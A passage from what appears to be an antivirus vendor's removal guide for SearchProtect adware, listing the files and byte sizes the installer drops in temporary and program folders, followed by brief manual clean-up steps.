%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4173_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\inetc.dll (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\SPtool.dll (65457 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\Logs\sp_nsr6.log (1847 bytes)
%Program Files%\SearchProtect\Main\rep\SystemRepository.dat (590 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG\installer.pak (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.exe (72144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GT6VKRAN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPYZIJUB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc4.tmp (2821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZUR84N48\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\SPIdentifierImpl[1].exe (72144 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.